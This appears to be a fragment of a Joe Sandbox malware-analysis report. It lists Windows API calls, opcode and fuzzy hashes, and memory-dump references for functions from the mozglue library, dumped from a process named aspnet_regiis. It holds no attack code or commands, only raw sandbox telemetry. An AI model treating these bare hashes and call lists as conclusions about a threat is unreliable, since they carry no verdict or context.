                                                                                                                                                                    • API String ID: 3217676052-1401603581
                                                                                                                                                                    • Opcode ID: 0ce351a4db85467a67da004cd8d0e15b95ba293e9df5a2117ba58b78815dabfc
                                                                                                                                                                    • Instruction ID: ef5f6df2b33ca3ea8655ba74aaf48a1f689768f1c6337337ad6442e26968efb1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce351a4db85467a67da004cd8d0e15b95ba293e9df5a2117ba58b78815dabfc
                                                                                                                                                                    • Instruction Fuzzy Hash: 26210331704583ABCB258FA88A9DE5933F6EB97339B00493DE42947F40C720A802C6D2
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F770,-00000001,?,6C80E330,?,6C7BBDF7), ref: 6C7FA7AF
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C7BBDF7), ref: 6C7FA7C2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C7BBDF7), ref: 6C7FA7E4
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F770), ref: 6C7FA80A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                    • String ID: accelerator.dll
                                                                                                                                                                    • API String ID: 2442272132-2426294810
                                                                                                                                                                    • Opcode ID: d006cdffdfdf0974cfc7742753c502be2351cb8b28d2f0d42a5eec974d072fda
                                                                                                                                                                    • Instruction ID: 0aa340f60797ff1ddb14220d432d3846543765fc8fb700af2cebf79cf3fe92d1
                                                                                                                                                                    • Opcode Fuzzy Hash: d006cdffdfdf0974cfc7742753c502be2351cb8b28d2f0d42a5eec974d072fda
                                                                                                                                                                    • Instruction Fuzzy Hash: 2501DFB07003449FAB14CF59D9C5C217BF8FB9A328700887AE8098BB01DB709800CBA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7FC0E9), ref: 6C7FC418
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C7FC437
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7FC0E9), ref: 6C7FC44C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-2623246514
                                                                                                                                                                    • Opcode ID: b44b859badef2bc4f2ea521ae4f9066b4cbaa72bb51c98691f95e49dc0d94374
                                                                                                                                                                    • Instruction ID: d4354656f9983eb27fa308cee05153a9cf50fcb768d2f3be87a0aa39a0115edc
                                                                                                                                                                    • Opcode Fuzzy Hash: b44b859badef2bc4f2ea521ae4f9066b4cbaa72bb51c98691f95e49dc0d94374
                                                                                                                                                                    • Instruction Fuzzy Hash: A9E092B46053139BDB30AB759A0A7217FF8A75620DF004A36AA18D2F10EBB0D012CA90
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7F748B,?), ref: 6C7F75B8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7F75D7
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7F748B,?), ref: 6C7F75EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-3641475894
                                                                                                                                                                    • Opcode ID: 101e447fefcafa44e3a86cc91004d09219505d5c2354e6f5eca2c1616ae0b6dd
                                                                                                                                                                    • Instruction ID: 4137a3056a0593b80eda841fb06a6e9c07bac7b3b068f978032fbb1fb4e50d3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 101e447fefcafa44e3a86cc91004d09219505d5c2354e6f5eca2c1616ae0b6dd
                                                                                                                                                                    • Instruction Fuzzy Hash: F2E09AB1604343ABDB219BA2D98A7117AF8E75721CF108835A915D2F10DB749092CF90
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7F7592), ref: 6C7F7608
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C7F7627
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7F7592), ref: 6C7F763C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-1050664331
                                                                                                                                                                    • Opcode ID: 41b484e7e23f03c6f99e599a7868c2a56339125611bcb4135f8136fda495c2c9
                                                                                                                                                                    • Instruction ID: 858ca1499b1c217db6744c943d3a4d74dc1c6b8e27905efb82da5c65f3661c1c
                                                                                                                                                                    • Opcode Fuzzy Hash: 41b484e7e23f03c6f99e599a7868c2a56339125611bcb4135f8136fda495c2c9
                                                                                                                                                                    • Instruction Fuzzy Hash: F5E09AB06047839BDF215FE6994A7157AF8E76735DF008935E909D2F10D7709051CB94
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C7FBE49), ref: 6C7FBEC4
                                                                                                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C7FBEDE
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C7FBE49), ref: 6C7FBF38
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C7FBF83
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7FBFA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2764315370-0
                                                                                                                                                                    • Opcode ID: 6abb8d38cdfd5d9679ba322c35cf3bc57a227df297a7b4c65f2eed7e5b100f28
                                                                                                                                                                    • Instruction ID: a114ff74839e69c59a798c7fc060f82a99634305db92ebb26c2844fa96f51872
                                                                                                                                                                    • Opcode Fuzzy Hash: 6abb8d38cdfd5d9679ba322c35cf3bc57a227df297a7b4c65f2eed7e5b100f28
                                                                                                                                                                    • Instruction Fuzzy Hash: 71517071A002058FE714CF69CEC0BAAB7A6FF84314F298639D525A7B55D730F9078B91
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8E6E
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8EBF
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F24
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8F46
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F7A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F8F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: 282f7f30398015b8b2cf74a96ff423f471592cc2b289753a25643e737bf09700
                                                                                                                                                                    • Instruction ID: bc75c9114ef722e644473d0f0ff3fa86a188b83859840370eaeae26d5faf38a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 282f7f30398015b8b2cf74a96ff423f471592cc2b289753a25643e737bf09700
                                                                                                                                                                    • Instruction Fuzzy Hash: B151B4B2A012168FEB15CF68D98076E73B6FF48318F25057AD916AB741E731F904CB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E284D
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E289A
                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E28F1
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E2910
                                                                                                                                                                    • free.MOZGLUE(00000001,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E293C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C7E2620,?,?,?,6C7D60AA,6C7D5FCB,6C7D79A3), ref: 6C7E294E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: b332d20fc3609d8975c57f223f29f6d06ecc3e67f65b359c70bbd8bc1f7d9bc2
                                                                                                                                                                    • Instruction ID: b68df6335f87a5b68caa92ddb505b2c83c4773b3861d3204d5636a9069d47786
                                                                                                                                                                    • Opcode Fuzzy Hash: b332d20fc3609d8975c57f223f29f6d06ecc3e67f65b359c70bbd8bc1f7d9bc2
                                                                                                                                                                    • Instruction Fuzzy Hash: B74160B2A002078FEB14CF68D98876A77F6AB49308F250939D556EBB41E771E904CB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C79CFF6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C79D026
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C79D06C
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C79D139
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C794EE9
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C794F02
                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C794F1E
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F770), ref: 6C7FA858
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FA87B
                                                                                                                                                                      • Part of subcall function 6C7FA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C7FA88F,00000000), ref: 6C7FA9F1
                                                                                                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C7FA8FF
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FA90C
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F770), ref: 6C7FA97E
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A159C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A15BC
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A15E7
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A1606
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C7A152B,?,?,?,?,6C7A1248,?), ref: 6C7A1637
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAD9D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FADAC
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE01
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE1D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C80E330,?,6C7BC059), ref: 6C7FAE3D
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C80DCA0,?,?,?,6C7CE8B5,00000000), ref: 6C7F5F1F
                                                                                                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C7CE8B5,00000000), ref: 6C7F5F4B
                                                                                                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C7CE8B5,00000000), ref: 6C7F5F7B
                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C7CE8B5,00000000), ref: 6C7F5F9F
                                                                                                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C7CE8B5,00000000), ref: 6C7F5FD6
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C79B532
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C79B55B
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C79B56B
                                                                                                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C79B57E
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C79B58F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4244350000-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C79B7CF
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C79B808
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C79B82C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C79B840
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C79B849
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1977084945-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C7F6E78
                                                                                                                                                                      • Part of subcall function 6C7F6A10: InitializeCriticalSection.KERNEL32(6C81F618), ref: 6C7F6A68
                                                                                                                                                                      • Part of subcall function 6C7F6A10: GetCurrentProcess.KERNEL32 ref: 6C7F6A7D
                                                                                                                                                                      • Part of subcall function 6C7F6A10: GetCurrentProcess.KERNEL32 ref: 6C7F6AA1
                                                                                                                                                                      • Part of subcall function 6C7F6A10: EnterCriticalSection.KERNEL32(6C81F618), ref: 6C7F6AAE
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7F6AE1
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7F6B15
                                                                                                                                                                      • Part of subcall function 6C7F6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7F6B65
                                                                                                                                                                      • Part of subcall function 6C7F6A10: LeaveCriticalSection.KERNEL32(6C81F618,?,?), ref: 6C7F6B83
                                                                                                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C7F6EC1
                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7F6EE1
                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7F6EED
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C7F6EFF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4058739482-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C793DEF), ref: 6C7D0D71
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C793DEF), ref: 6C7D0D84
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C793DEF), ref: 6C7D0DAF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$Free$Alloc
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                    • API String ID: 1852963964-2186867486
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6C7F586C
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6C7F5878
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C7F5898
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7F58C9
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7F58D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1910681409-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7E75C4,?), ref: 6C7E762B
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7644
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E765A
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7663
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7E74D7,6C7F15FC,?,?,?), ref: 6C7E7677
                                                                                                                                                                    Memory Dump Source
